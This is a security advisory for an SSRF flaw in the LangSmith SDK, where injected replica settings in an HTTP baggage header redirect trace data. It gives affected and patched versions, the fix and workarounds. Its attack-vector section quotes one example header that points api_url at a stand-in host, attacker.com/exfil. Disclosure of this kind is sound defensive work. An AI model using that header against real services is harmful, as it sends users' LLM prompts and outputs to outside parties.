GHSA-v34v-rq6j-cj6p

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

Description

When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.

Attack Vector

Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:

baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]

The service parses the header via RunTree.from_headers(), storing the attacker's URL
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil

Impact

Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

Affected Use Cases

Applications are vulnerable if they: - Use TracingMiddleware to automatically propagate tracing context - Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers

Remediation

Update to the patched versions: - Python: pip install langsmith>=0.6.3 - JavaScript: npm install langsmith@>=0.4.6

The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.

Workarounds

If unable to upgrade immediately: - Strip or validate the baggage header before passing to from_headers() - Do not use TracingMiddleware with untrusted traffic

Database specific

{
    "cwe_ids": [
        "CWE-918"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "nvd_published_at": "2026-02-09T21:15:48Z",
    "github_reviewed_at": "2026-02-09T20:36:59Z"
}

References

Affected packages

PyPI / langsmith

Package

Name: langsmith; View open source insights on deps.dev
Purl: pkg:pypi/langsmith

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0.4.10

Fixed

0.6.3

Affected versions

0.*

0.4.10

0.4.11

0.4.12

0.4.13

0.4.14

0.4.15

0.4.16

0.4.17

0.4.18

0.4.19

0.4.20

0.4.21

0.4.22

0.4.23

0.4.24

0.4.25

0.4.26

0.4.27

0.4.28

0.4.29

0.4.30

0.4.31

0.4.32rc0

0.4.32

0.4.33

0.4.34

0.4.35rc1

0.4.35

0.4.36

0.4.37

0.4.38

0.4.39rc0

0.4.39rc1

0.4.39

0.4.40

0.4.41

0.4.42rc0

0.4.42

0.4.43rc0

0.4.43

0.4.44

0.4.45

0.4.46

0.4.47

0.4.48

0.4.49

0.4.50

0.4.51

0.4.52

0.4.53

0.4.54rc0

0.4.54

0.4.55

0.4.56

0.4.57

0.4.58

0.4.59

0.4.60

0.5.0

0.5.1

0.5.2

0.6.0rc0

0.6.0

0.6.1

0.6.2

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"

npm / langsmith

Package

Name: langsmith; View open source insights on deps.dev
Purl: pkg:npm/langsmith

Affected ranges

Type: SEMVER
Events: Introduced

0.3.41

Fixed

0.4.6

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"